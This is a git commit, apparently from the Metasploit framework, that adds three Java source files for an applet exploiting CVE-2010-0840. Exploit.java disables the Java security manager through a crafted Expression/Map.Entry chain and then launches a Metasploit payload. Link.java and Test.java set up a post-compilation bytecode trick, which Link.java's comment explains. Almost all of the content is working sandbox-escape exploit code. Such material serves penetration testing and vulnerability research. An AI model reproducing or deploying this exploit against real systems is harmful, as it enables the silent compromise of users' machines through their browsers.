add source code for cve-2010-0840

git-svn-id: file:///home/svn/framework3/trunk@10095 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-21 07:27:26 +00:00 · 2010-08-21 07:27:26 +00:00 · b35cea94cd
parent 7ad4f80014
commit b35cea94cd
3 changed files with 97 additions and 0 deletions
--- a/external/source/exploits/CVE-2010-0840/vuln/Exploit.java
+++ b/external/source/exploits/CVE-2010-0840/vuln/Exploit.java
@ -0,0 +1,47 @@
+package vuln;
+
+import java.applet.Applet;
+import java.io.IOException;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.Set;
+
+import javax.swing.JList;
+
+import metasploit.Payload;
+
+public class Exploit extends Applet {
+
+	public void start() {
+		super.start();
+
+        try {
+            Payload.main(null);
+        } catch (Exception e) {}
+	}
+
+	public Exploit() {
+		System.out.println("Exploiting");
+		Object target = System.class;
+		String methodName = "setSecurityManager";
+		Object[] args = new Object[] { null };
+
+		Link l = new vuln.Link(target, methodName, args);
+
+		final HashSet s = new HashSet();
+		s.add(l);
+
+		Map h = new HashMap() {
+
+			public Set entrySet() {
+				return s;
+			};
+
+		};
+
+		JList list = new JList(new Object[] { h });
+		this.add(list);
+
+	}
+}
--- a/external/source/exploits/CVE-2010-0840/vuln/Link.java
+++ b/external/source/exploits/CVE-2010-0840/vuln/Link.java
@ -0,0 +1,36 @@
+package vuln;
+
+import java.beans.Expression;
+import java.util.Map;
+
+/*
+ * So if i understand this correctly...
+ *
+ * Normally this wouldn't work because a normal compiler won't allow us to
+ * create a non-abstract class that doesn't fully implement an interface. To
+ * get around this we create a dummy interface that only contains the method
+ * we're interested in (in this case, getValue()) and modify the .class file
+ * after compilation to implement Map$Entry instead of Test.
+ *
+ * Because of the compiler trickery above, Link now inherits getValue() from
+ * Expression instead of from non-privileged applet code and can be used as a
+ * Map.Entry.  Expression.getValue() calls Statement.invoke() using the
+ * parameters we give it in the Exploit class, allowing us to call arbitrary
+ * methods of arbitrary classes.  Since it started out in library code, and
+ * since we didn't use any non-privileged methods, it runs in a privileged
+ * context.  Whew.
+ *
+ */
+public class Link extends Expression implements Test {
+
+	Map.Entry entry;
+	
+	public Link(Object target, String methodName, Object[] arguments) {
+		super(target, methodName, arguments);
+	}
+
+	public Object getKey() {
+		return null;
+	}
+
+}
--- a/external/source/exploits/CVE-2010-0840/vuln/Test.java
+++ b/external/source/exploits/CVE-2010-0840/vuln/Test.java
@ -0,0 +1,14 @@
+package vuln;
+
+/*
+ * This is just a placeholder class.  Link implements this so it can be
+ * replaced after compilation with Map.Entry since a normal compiler will not
+ * allow creating a class that implements an interface through inheritance.
+ *
+ * See Sami Koivu's original blog post for details.
+ */
+public interface Test {
+	
+	public Object getValue() throws Exception;
+
+}